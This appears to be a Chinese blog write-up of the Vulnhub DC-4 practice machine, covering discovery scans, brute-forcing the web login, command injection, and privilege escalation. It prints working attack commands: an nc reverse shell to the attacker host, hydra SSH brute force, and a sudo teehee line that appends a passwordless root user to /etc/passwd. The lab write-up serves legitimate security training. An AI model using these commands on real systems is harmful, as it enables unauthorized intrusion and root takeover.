Vulnhub靶机——DC-4

目录

一、实验环境

1.1 攻击机Kali

1.2 靶机下载

1.3 工具准备

二、站点信息收集

2.1 IP扫描

2.2 端口扫描

2.3 目录扫描

三、漏洞利用

3.1 暴力破解

3.2 命令执行

四、权限提升

4.1 nc反弹shell

4.2 收集信息

4.3 teehee提权


一、实验环境

1.1 攻击机Kali

(1)在虚拟机中安装Kali系统并作为攻击机,将网络连接设置成NAT模式

(2)Kali的IP地址为192.168.101.130

1.2 靶机下载

(1)下载地址: DC: 4 ~ VulnHub

(2)通过上述简介可以知道,此靶机只有一面旗帜,但有多个入口点。

(3)直接在VMware虚拟机中导入该靶机,将网络连接设置成NAT模式

(4)开启靶机

1.3 工具准备
  • BurpSuite
  • 用户名和密码的渗透字典
  • hydra

二、站点信息收集

2.1 IP扫描

使用命令arp-scan -l查找靶机的IP地址,发现靶机地址为192.168.101.150

2.2 端口扫描

(1)使用nmap工具对目标机进行端口扫描,发现打开了22端口,80端口

(2)访问80端口,是一个登录界面

2.3 目录扫描

使用dirsearch工具对网站目录进行扫描,没有什么其他的发现,都需要先进行登录

三、漏洞利用

3.1 暴力破解

(1)在登录页面输入随机的用户名和密码,打开burpsuite进行抓包

(2)将抓到的数据包发送到Intruder

(3)设置爆破类型为Cluster bomb,添加爆破点username和password

(4)为用户名和密码上传常见的字典并开始爆破

(5)成功得到用户名和密码admin|happy

3.2 命令执行

(1)使用爆破出来的数据进行登录,登录页面如下,点击Command

(2)选择List Files,点击run,回显命令ls -l和命令执行的结果

(3)使用burpsuite进行抓包,在ls+-l处尝试命令注入

(4)将数据包发送到Repeater

(5)在数据包的ls -l处写入命令whoami,点击send,发现网页执行了该命令,存在命令执行漏洞

四、权限提升

4.1 nc反弹shell

(1)在kali中开启监听

(2)在数据包中写入nc反弹shell命令,点击send,命令执行成功

nc -e /bin/bash 192.168.101.130 5555 //空格用+替换

(3)kali监听成功

4.2 收集信息

(1)使用脚本获得一个交互式的webshell

python -c 'import pty;pty.spawn("/bin/bash")'

(2)在/home/jim目录下发现一个old-passwords.bak文件,可能是jim用户之前使用过的旧密码,查看该文件

(3)另外两个用户charles和sam目录下没有什么东西

(4)将刚刚old-passwords.bak文件中的密码保存到一个passwd.txt文件中

(5)使用hydra工具进行爆破,爆破成功

hydra -l jim -P /home/kali/Desktop/渗透字典/passwd.txt -t 10 ssh://192.168.101.150

(6)使用爆破出来的密码进行登录,这里提示我们有一封邮件

(7)去邮件目录下查看内容,发现charles用户的密码^xHhA&hvim0y

(8)切换到charles用户,登录成功

4.3 teehee提权

(1)由于charles目录下没有什么有用的东西,查看可以执行的root权限的命令

teehee 是一个非常小型的文本编辑器,通常用于 Linux 系统中的命令行环境。它的功能和操作方式类似于其他命令行文本编辑器,不具备像 vim 或 nano 那样丰富的功能和扩展性。它的目的是为用户提供一个快速、直观的编辑工具,适合需要快速修改文本文件的场景。

(2)利用管道符配合teehee命令,在passwd文件里写入一个不用密码的root权限的用户awuawu,并切换用户

echo 'awuawu::0:0:::/bin/bash' | sudo teehee -a /etc/passwd //-a表示将内容追加到文件末尾

(3)提权成功,查看flag

声明

1.本博客文章均为博主日常学习原创内容,转载请注明出处。

2.文章内容如有涉及侵犯您的知识产权和版权问题,请及时与我联系。

3.希望以上的学习经验分享能对您有所帮助。

4.本内容仅供学习和研究使用,严禁用于任何非法或不道德的行为,任何违反法律的行为将由行为人自行承担。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值